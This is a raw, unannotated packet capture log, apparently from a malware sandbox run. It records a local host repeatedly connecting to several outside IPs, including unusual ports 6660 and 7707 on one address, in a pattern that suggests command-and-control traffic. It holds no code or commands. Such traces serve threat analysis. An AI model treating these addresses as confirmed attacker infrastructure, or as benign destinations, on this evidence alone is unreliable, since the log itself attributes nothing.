                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.962307930 CEST8049893188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.963552952 CEST8049893188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.963608027 CEST4989380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.965667963 CEST4989380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.081655025 CEST4989680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.086528063 CEST8049896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.086591959 CEST4989680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.086632967 CEST4989680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.091599941 CEST8049896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.091665030 CEST4989680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.096853018 CEST8049896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.099015951 CEST44349894149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.105328083 CEST49894443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.105350018 CEST44349894149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.294887066 CEST498836660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.295263052 CEST498976660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.299750090 CEST66604988394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.300076962 CEST66604989794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.300146103 CEST498976660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.300453901 CEST498976660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.305246115 CEST66604989794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.376362085 CEST44349894149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.376405001 CEST44349894149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.376581907 CEST49894443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.376867056 CEST49894443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.387516022 CEST44349895172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.387609005 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.389375925 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.389390945 CEST44349895172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.389628887 CEST44349895172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.390865088 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.432501078 CEST44349895172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.521778107 CEST44349895172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.521862030 CEST44349895172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.521933079 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.523042917 CEST49895443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.571952105 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.571969986 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.572036028 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.572271109 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.572284937 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.756436110 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.756467104 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.756536007 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.789647102 CEST8049896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.790613890 CEST8049896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.790846109 CEST4989680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.793526888 CEST4989680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.847213030 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.847250938 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.909507036 CEST4990080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.914339066 CEST8049900188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.914411068 CEST4990080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.914532900 CEST4990080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.919336081 CEST8049900188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.919430971 CEST4990080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.924273968 CEST8049900188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.178353071 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.346328020 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.423535109 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.423556089 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.585637093 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.611335039 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.611358881 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.747663021 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.753660917 CEST8049900188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.754223108 CEST8049900188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.754327059 CEST4990080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.757133961 CEST4990080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.769859076 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.769880056 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.770035028 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.770040035 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.821585894 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.821605921 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.821671009 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.821676970 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.863079071 CEST4990180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.868099928 CEST8049901188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.868201017 CEST4990180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.868284941 CEST4990180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.873157978 CEST8049901188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.874512911 CEST4990180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.879293919 CEST8049901188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.884664059 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.884681940 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.886099100 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.901025057 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.901036978 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.902916908 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.902944088 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903184891 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903188944 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903271914 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903287888 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903826952 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903846979 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903969049 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.903995037 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904088974 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904099941 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904155016 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904165983 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904273033 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904280901 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904293060 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904299021 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904426098 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.904447079 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.924302101 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.924314976 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.950252056 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.950268984 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.956337929 CEST66604989794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.956403971 CEST498976660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.991386890 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.991409063 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.003184080 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.003191948 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.033478022 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.033497095 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.048549891 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.048562050 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.081052065 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.081058025 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.255070925 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.255151033 CEST44349898149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.255213022 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.256277084 CEST49898443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.492156029 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.492228031 CEST44349899149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.492273092 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.492763996 CEST49899443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.493829012 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.493865013 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.493932962 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.494165897 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.494182110 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.617403030 CEST8049901188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.618174076 CEST8049901188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.618247032 CEST4990180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.621535063 CEST4990180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.737759113 CEST4990480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.745661020 CEST8049904188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.745754004 CEST4990480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.745851040 CEST4990480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.754014969 CEST8049904188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.754070997 CEST4990480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.761885881 CEST8049904188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.970210075 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.970290899 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.971972942 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.971985102 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.972223043 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.973722935 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.016503096 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.123375893 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.123461008 CEST44349903172.67.19.24192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.123583078 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.123922110 CEST49903443192.168.2.4172.67.19.24
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.143954992 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.143976927 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.144048929 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.144727945 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.144747972 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.485898018 CEST8049904188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.486706972 CEST8049904188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.486757994 CEST4990480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.490374088 CEST4990480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.603152037 CEST4990680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.608118057 CEST8049906188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.611809969 CEST4990680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.614243031 CEST4990680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.619326115 CEST8049906188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.619786024 CEST4990680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.624682903 CEST8049906188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.658023119 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.663249969 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.663320065 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.668221951 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.783467054 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.785227060 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.785243034 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.987631083 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.049453020 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.097872972 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098134995 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098145008 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098340988 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098360062 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098458052 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098479986 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098745108 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.098759890 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099126101 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099139929 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099246979 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099256992 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099282980 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099293947 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099421024 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099431992 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099447012 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099452972 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099495888 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.099502087 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.128237009 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.170608044 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.175479889 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.175539970 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.180423975 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.330326080 CEST8049906188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.330746889 CEST8049906188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.330805063 CEST4990680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.334350109 CEST4990680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.440716982 CEST4990780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.445687056 CEST8049907188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.445755005 CEST4990780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.445791960 CEST4990780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.450654030 CEST8049907188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.450706005 CEST4990780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.455586910 CEST8049907188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.551558018 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.551645041 CEST44349905149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.551790953 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.552290916 CEST49905443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.198432922 CEST8049907188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.198447943 CEST8049907188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.198512077 CEST4990780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.202306986 CEST4990780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.316098928 CEST4990880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.320988894 CEST8049908188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.321067095 CEST4990880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.321115017 CEST4990880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.325936079 CEST8049908188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.325982094 CEST4990880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:50.330739975 CEST8049908188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.072787046 CEST8049908188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.073812008 CEST8049908188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.073890924 CEST4990880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.094774961 CEST4990880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.206315994 CEST4990980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.211225986 CEST8049909188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.211306095 CEST4990980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.211390972 CEST4990980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.216165066 CEST8049909188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.216211081 CEST4990980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.221046925 CEST8049909188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.973701954 CEST8049909188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.974154949 CEST8049909188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.974261045 CEST4990980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:51.978667021 CEST4990980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.015580893 CEST498976660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.015968084 CEST499106660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.022579908 CEST66604989794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.022595882 CEST66604991094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.022663116 CEST499106660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.022988081 CEST499106660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.027893066 CEST66604991094.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.081379890 CEST4991180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.086380005 CEST8049911188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.086432934 CEST4991180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.086477041 CEST4991180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.091985941 CEST8049911188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.092047930 CEST4991180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.097362041 CEST8049911188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.810226917 CEST8049911188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.810853958 CEST8049911188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.810935974 CEST4991180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.814743996 CEST4991180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.925075054 CEST4991280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:52.930064917 CEST8049912188.114.96.3192.168.2.4
